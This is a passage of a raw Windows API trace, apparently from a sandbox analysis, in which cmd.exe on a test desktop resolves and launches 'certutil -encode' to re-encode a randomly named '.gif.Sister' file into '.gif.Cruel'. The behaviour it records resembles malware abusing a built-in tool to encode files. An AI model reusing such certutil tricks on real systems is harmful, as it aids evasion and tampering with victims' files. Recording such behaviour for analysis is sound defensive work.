0x21ed97bfc00 [0281.154] GetProcessHeap () returned 0x21ed8c70000 [0281.154] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x48) returned 0x21ed8cc77e0 [0281.154] ??_V@YAXPEAX@Z () returned 0x1 [0281.154] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0281.154] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cf40 [0281.155] FindClose (in: hFindFile=0x21ed8c7cf40 | out: hFindFile=0x21ed8c7cf40) returned 1 [0281.155] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cdc0 [0281.155] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0281.155] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd1c7f261, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd1c7f261, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cc40 [0281.155] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0281.155] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\zuXa5tA1VeTtCxZv.gif.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4af0ff20, ftCreationTime.dwHighDateTime=0x1d5eaf6, ftLastAccessTime.dwLowDateTime=0x51221bc0, ftLastAccessTime.dwHighDateTime=0x1d5ed64, ftLastWriteTime.dwLowDateTime=0x51221bc0, ftLastWriteTime.dwHighDateTime=0x1d5ed64, nFileSizeHigh=0x0, nFileSizeLow=0x7a94, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="zuXa5tA1VeTtCxZv.gif.Sister", cAlternateFileName="ZUXA5T~1.SIS")) returned 0x21ed8c7cc40 [0281.156] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0281.156] _wcsnicmp (_String1="ZUXA5T~1.SIS", _String2="zuXa5tA1VeTtCxZv.gif.Sister", _MaxCount=0x1b) returned 29 [0281.156] malloc (_Size=0x1ff9c) returned 0x21ed97dfbb0 [0281.156] ??_V@YAXPEAX@Z () returned 0x21ed97dfbb0 [0281.156] GetProcessHeap () returned 0x21ed8c70000 [0281.156] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3a) returned 0x21ed8cc7a10 [0281.156] ??_V@YAXPEAX@Z () returned 0x1 [0281.156] ??_V@YAXPEAX@Z () returned 0x1 [0281.156] GetProcessHeap () returned 0x21ed8c70000 [0281.156] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d2a660, Size=0x230) returned 0x21ed8d2a660 [0281.156] GetProcessHeap () returned 0x21ed8c70000 [0281.156] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2a660) returned 0x230 [0281.156] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0281.156] _get_osfhandle (_FileHandle=1) returned 0x50 [0281.156] GetFileType (hFile=0x50) returned 0x2 [0281.156] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0281.156] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0281.225] _get_osfhandle (_FileHandle=1) returned 0x50 [0281.225] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0281.299] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0281.299] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0281.300] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0281.300] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0281.300] _get_osfhandle (_FileHandle=1) returned 0x50 [0281.300] GetFileType (hFile=0x50) returned 0x2 [0281.300] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0281.300] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0281.369] _get_osfhandle (_FileHandle=1) returned 0x50 [0281.369] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0281.481] _get_osfhandle (_FileHandle=1) returned 0x50 [0281.481] GetFileType (hFile=0x50) returned 0x2 [0281.481] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0281.482] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0281.551] _get_osfhandle (_FileHandle=1) returned 0x50 [0281.551] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d2a600*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed8d2a600*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0281.805] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"zuXa5tA1VeTtCxZv.gif.Sister\" \"zuXa5tA1VeTtCxZv.gif.Cruel\" ") returned 68 [0281.805] _get_osfhandle (_FileHandle=1) returned 0x50 [0281.805] GetFileType (hFile=0x50) returned 0x2 [0281.806] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0281.806] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0281.885] _get_osfhandle (_FileHandle=1) returned 0x50 [0281.885] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x44, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x44) returned 1 [0282.016] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0282.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0282.016] GetFileType (hFile=0x50) returned 0x2 [0282.016] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0282.016] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0282.092] _get_osfhandle (_FileHandle=1) returned 0x50 [0282.093] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0282.181] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0282.307] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0282.308] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0282.308] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0282.308] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0282.308] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0282.308] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0282.308] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0282.308] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0282.308] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0282.308] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0282.308] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0282.308] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0282.308] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0282.308] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0282.308] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0282.308] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0282.308] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0282.308] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0282.308] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0282.308] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0282.309] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0282.309] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0282.309] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0282.309] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0282.309] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0282.309] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0282.309] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0282.309] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0282.309] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0282.309] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0282.309] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0282.309] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0282.309] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0282.309] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0282.309] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0282.309] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0282.309] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0282.309] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0282.309] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0282.309] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0282.309] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0282.309] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0282.309] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0282.309] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0282.309] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0282.309] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0282.309] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0282.310] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0282.310] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0282.310] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0282.310] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0282.310] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0282.310] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0282.310] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0282.310] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0282.310] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0282.310] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0282.310] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0282.310] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0282.310] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0282.310] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0282.310] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0282.310] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0282.310] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0282.310] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0282.310] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0282.310] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0282.310] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0282.310] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0282.310] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0282.310] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0282.310] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0282.310] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0282.311] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0282.311] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0282.311] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0282.311] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0282.311] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0282.311] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0282.311] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0282.311] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0282.311] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0282.311] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0282.311] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0282.311] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0282.311] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0282.311] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0282.311] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0282.311] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0282.311] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0282.311] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0282.311] ??_V@YAXPEAX@Z () returned 0x1 [0282.311] GetProcessHeap () returned 0x21ed8c70000 [0282.311] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9431060 [0282.312] GetProcessHeap () returned 0x21ed8c70000 [0282.312] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xaa) returned 0x21ed8c96280 [0282.312] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0282.312] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0282.312] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0282.312] GetProcessHeap () returned 0x21ed8c70000 [0282.312] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed9441050 [0282.314] SetErrorMode (uMode=0x0) returned 0x0 [0282.314] SetErrorMode (uMode=0x1) returned 0x0 [0282.314] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed9441060, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xa6cf4fdb80*="Desktop") returned 0x17 [0282.315] SetErrorMode (uMode=0x0) returned 0x1 [0282.315] GetProcessHeap () returned 0x21ed8c70000 [0282.315] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9441050, Size=0x52) returned 0x21ed9441050 [0282.315] GetProcessHeap () returned 0x21ed8c70000 [0282.315] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9441050) returned 0x52 [0282.315] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0282.315] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0282.315] GetProcessHeap () returned 0x21ed8c70000 [0282.315] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1bc) returned 0x21ed937b370 [0282.315] GetProcessHeap () returned 0x21ed8c70000 [0282.315] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x368) returned 0x21ed8d44660 [0282.315] GetProcessHeap () returned 0x21ed8c70000 [0282.315] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d44660, Size=0x1be) returned 0x21ed8d44660 [0282.315] GetProcessHeap () returned 0x21ed8c70000 [0282.315] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d44660) returned 0x1be [0282.315] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0282.316] GetProcessHeap () returned 0x21ed8c70000 [0282.316] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8d61e80 [0282.316] GetProcessHeap () returned 0x21ed8c70000 [0282.316] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d61e80, Size=0x7e) returned 0x21ed8d61e80 [0282.316] GetProcessHeap () returned 0x21ed8c70000 [0282.316] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d61e80) returned 0x7e [0282.316] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0282.316] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0282.317] GetLastError () returned 0x2 [0282.317] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0282.317] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0282.318] GetLastError () returned 0x2 [0282.318] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0282.318] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cc40 [0282.319] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0282.319] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0282.319] GetLastError () returned 0x2 [0282.319] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cc40 [0282.319] FindClose (in: hFindFile=0x21ed8c7cc40 | out: hFindFile=0x21ed8c7cc40) returned 1 [0282.319] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0282.320] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0282.320] ??_V@YAXPEAX@Z () returned 0x1 [0282.320] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0282.396] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0282.396] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0282.396] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0282.397] GetProcessHeap () returned 0x21ed8c70000 [0282.397] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45b30 [0282.397] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0282.397] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0282.397] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0282.397] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0282.397] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0282.397] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0282.397] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0282.397] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0282.397] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0282.397] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0282.397] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0282.397] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0282.397] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0282.397] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0282.397] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0282.398] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0282.398] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0282.398] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0282.398] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0282.398] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0282.398] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0282.398] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0282.398] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0282.398] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0282.398] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0282.398] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0282.398] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0282.398] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0282.398] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0282.398] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0282.398] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0282.398] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0282.398] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0282.398] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0282.398] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0282.398] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0282.398] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0282.398] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0282.398] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0282.398] GetProcessHeap () returned 0x21ed8c70000 [0282.399] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45b30) returned 1 [0282.399] GetProcessHeap () returned 0x21ed8c70000 [0282.399] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c955c0 [0282.399] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0282.399] _get_osfhandle (_FileHandle=1) returned 0x50 [0282.399] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0282.488] _get_osfhandle (_FileHandle=0) returned 0x4c [0282.488] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0282.563] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"zuXa5tA1VeTtCxZv.gif.Sister\" \"zuXa5tA1VeTtCxZv.gif.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"zuXa5tA1VeTtCxZv.gif.Sister\" \"zuXa5tA1VeTtCxZv.gif.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"zuXa5tA1VeTtCxZv.gif.Sister\" \"zuXa5tA1VeTtCxZv.gif.Cruel\"", 